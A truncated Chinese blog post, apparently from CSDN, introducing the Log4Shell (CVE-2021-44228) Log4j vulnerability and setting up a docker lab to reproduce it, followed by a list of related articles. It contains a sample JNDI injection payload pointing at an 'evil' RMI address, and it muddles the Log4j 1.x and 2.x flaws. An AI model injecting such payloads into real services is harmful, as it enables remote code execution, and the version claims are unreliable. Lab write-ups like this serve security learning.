网络安全 log4j漏洞复现

本文为博客 VIP 文章,开通 VIP 后可阅读全文

开通 VIP

前言:

log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。

漏洞描述:

由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。简单点说,就是可以通过输入一些具有特殊意义的字符来攻击服务器。

如果入侵者在前端页面上输入了:${jndi:rmi://127.0.0.1:8080/evil} 这串字符, 然后后台用log4j记录了这串字符, log4j会自动使用jndi调用这个地址上的rmi内容。如果这个rmi的内容是删除数据库,重启服务器这种恶意程序,被攻击之后还是趁早跑路吧。(开个玩笑)

关于JNDI:

JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源),JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA,摘自百度百科。

关于RMI:

RMI(remote method invocation)即远程方法调用,是允许运行在一个java虚拟机上的对象调用运行在另外一个java虚拟机上的对象的方法,JAVA RMI实现JAVA程序之间跨越JVM的远程通信。通过RMI可以让调用远程JVM上对象方法,仿佛调用本地JVM上对象方法一样简单、快捷。

log4j简介

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。
Log4j 1.2 中包含一个 SocketServer 类,该类容易受到不可信数据反序列化的影响,当侦听不可信网络流量以获取日志数据时,该类可被利用与反序列化小工具结合使用以远程执行任意代码。攻击者可利用该漏洞执行任意代码。
这会影响从 1.2 到 2.14 的 Log4j 版本。

log4j环境搭建

  • log4漏洞环境搭建(需要docker)
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4
log4j漏洞复现(CVE-2021-44228) Log4j 2 是 Apache 基金会开发的一个广泛使用的 Java 日志记录库。CVE-2021-44228 是一个严重的远程代码执行(RCE)漏洞,也被称为 Log4Shell。该漏洞允许攻击者通过构造特定的日志消息来远程执行任意代码。 阅读详情

相关推荐

单细胞转录组数据质控实战:如何用Seurat精准过滤低质量细胞(附完整代码)

本文详细介绍了使用Seurat进行单细胞转录组数据质控的实战方法,包括基因检出数、分子计数和线粒体基因比例等关键指标的解读与可视化技巧。通过动态阈值策略和高级质控技巧(如双细胞检测和红细胞过滤),帮助研究者精准过滤低质量细胞,提升数据分析可靠性。附完整代码示例,适合生物信息学研究人员参考实践。

ii567的博客 772

log4j漏洞原理和靶场复现

log4j漏洞原理和靶场复现

Aiwin的博客 8598

华为等安卓手机的vcf无法导入苹果的iCloud 通讯录

华为等安卓手机的vcf无法导入苹果的iCloud 通讯录

Guocean 8546

CVE重要漏洞复现Log4J漏洞原理与实现(网络安全学习)

CVE重要漏洞复现Log4J漏洞原理与实现

没有网络安全就没有国家安全 2231

网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)

Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2

m0_67844671的博客 4577

网络安全实战入门:从0到1复现Log4j2漏洞的3个关键步骤

本文详细介绍了从0到1复现Log4j2漏洞的3个关键步骤,包括实验环境准备、漏洞原理分析与利用准备、漏洞触发与结果验证。通过实战操作,帮助网安初学者深入理解Log4j2漏洞的原理和渗透测试流程,提升网络安全实战能力。

dengyulong的专栏 389

阿一网络安全log4j2漏洞CVE-2021-44228复现

漏洞简介Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

Ayixy的博客 501

log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)

本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。

Bossfrank的博客 4万+

log4j历史漏洞复现

Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组 建等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目 标服务器上执行任意代码。

weixin_53747497的博客 1517

Log4j漏洞复现

Log4j漏洞复现

m1287578441的博客 3140

Web网络安全-----Log4j高危漏洞原理及修复

Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。

qq_51690690的博客 1万+

Log4j远程代码执行漏洞环境搭建及复现

Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。

m0_71263989的博客 2376

Log4j2漏洞复现

Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......

weixin_51519028的博客 1万+

log4j漏洞原理以及复现

kali:192.168.222.165 本机:192.168.225.18。

weixin_67840381的博客 1544

Log4j漏洞环境搭建以及复现拿getshell

环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u

qq_40898302的博客 2553

[漏洞复现]log4j漏洞RCE(CVE-2021-44228)

由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)

weixin_43895765的博客 8021

log4j漏洞详解

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。

weixin_61638307的博客 4965

OpenClaw小龙虾三版本安装包合集一包搞定全场景

这不是单一安装包,而是“全场景部署合集”:在线一键版 + 离线部署版 + 企业内网离线版 + 配套文档,一次下载按环境直接选用。无论你是个人学习、团队测试,还是企业正式部署,都能找到对应方案。适用人群:个人用户、团队管理员、企业实施负责人。适用场景:多环境交付、统一资源分发、培训与项目落地。核心关键词:OpenClaw 安装合集、Windows 全场景部署、AI Agent 安装包。

上一篇: 网络安全如何从零基础到精通?
下一篇: 自学网络安全,一般人我劝你还是算了吧
没更新就是没更新
博客等级 码龄4年 1693粉丝 157原创
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值